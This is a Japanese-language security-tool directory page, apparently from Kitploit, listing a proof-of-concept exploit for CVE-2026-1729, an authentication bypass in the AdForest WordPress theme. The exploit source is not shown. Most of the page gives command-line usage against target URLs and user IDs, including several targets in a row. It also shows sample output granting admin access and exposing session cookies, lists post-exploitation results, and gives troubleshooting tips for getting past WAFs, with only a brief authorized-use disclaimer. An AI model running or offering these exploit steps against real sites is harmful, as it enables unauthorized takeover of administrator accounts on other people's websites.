Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-1729-PoC-AdForest-WordPress-Authentication-Bypass — WordPress用AdForestテーマは、6.0.12を含むすべてのバージョンにおいて、認証バイパスの脆弱性があります。これは、プラグインが'sb_login_user_with_otp_fun'関数を通じてユーザーを認証する前に、ユーザーの身元を適切に検証していないことが原因です。これにより、未認証の攻撃者が管理者を含むアカウントにログインすることが可能になります。 | Kitploit
ツール/GitHubGitHub/ninjazan420/cve-2026-1729-poc-adforest-wordpress-authentication-bypass
認証と認可脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubninjazan420/cve-2026-1729-poc-adforest-wordpress-authentication-bypass

CVE-2026-1729-PoC-AdForest-WordPress-Authentication-Bypass

WordPress用AdForestテーマは、6.0.12を含むすべてのバージョンにおいて、認証バイパスの脆弱性があります。これは、プラグインが'sb_login_user_with_otp_fun'関数を通じてユーザーを認証する前に、ユーザーの身元を適切に検証していないことが原因です。これにより、未認証の攻撃者が管理者を含むアカウントにログインすることが可能になります。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
6ヶ月前未レビュー

CVE-2026-1729 - AdForest WordPress 認証バイパス PoC

説明

CVE-2026-1729 (PoC) のシンプルな Proof of Concept - AdForest WordPress テーマの認証バイパス脆弱性。 著者: f3ds cr3w est 2oo2 blog

特徴

  • ✅ 認証なしで管理者アクセス
  • ✅ 本番 WordPress 環境で動作
  • ✅ Docker のセットアップは不要
  • ✅ シンプルなコマンドラインインターフェース
  • ✅ セッションの永続化

必要条件

  • Python 3.6+
  • requests ライブラリ

インストール

root@kitploit:~
pip install requests

使い方

基本的な使い方

root@kitploit:~
python poc/exploit.py https://target-site.com

特定のユーザー ID を対象にする

root@kitploit:~
python poc/exploit.py https://target-site.com --user-id 2

例

root@kitploit:~
# Exploit default admin (user ID 1)
python poc/exploit.py https://example.com

# Exploit specific user account
python poc/exploit.py https://example.com --user-id 5

# Test multiple targets
python poc/exploit.py https://site1.com
python poc/exploit.py https://site2.com --user-id 3

出力

root@kitploit:~
CVE-2026-1729 - AdForest WordPress Authentication Bypass
=======================================================
WARNING: For authorized testing only!
=======================================================
[+] Target: https://example.com
[+] Targeting user ID: 1
[+] Sending exploit to: https://example.com/wp-admin/admin-ajax.php
[+] SUCCESS! Admin access granted
[+] Admin URL: https://example.com/wp-admin/
[+] Session cookies: {'wp-settings-time-1': '1234567890', 'wordpress_logged_in_...': '...'}
[+] Logged in as: admin

🎯 Exploit completed successfully!
You now have admin access to the WordPress site.

エクスプロイト後の結果

  1. 管理者アクセス: /wp-admin/ への完全な管理者アクセスが得られます。
  2. セッションの永続化: エクスプロイトはセッション Cookie を保持します。
  3. ユーザー情報: 侵害したアカウントを表示します。
  4. 直接アクセス: WordPress 管理ダッシュボードにすぐにアクセスできます。

注意事項

  • 法的使用: 自分が所有しているサイト、または明示的なテスト許可を得たサイトでのみ使用してください。
  • ターゲットの要件: サイトに AdForest テーマがインストールされている必要があります。
  • 成功率: 脆弱なバージョンの AdForest テーマで動作します。
  • インストール不要: ターゲットサーバーに何かをインストールする必要はありません。

トラブルシューティング

エクスプロイトが失敗した場合:

  1. AdForest テーマがインストールされているか確認します。
  2. サイトが WordPress で動作しているか確認します。
  3. テーマのバージョンが脆弱であることを確認します。
  4. WAF やセキュリティプラグインがリクエストをブロックしていないか確認します。
ツールをダウンロード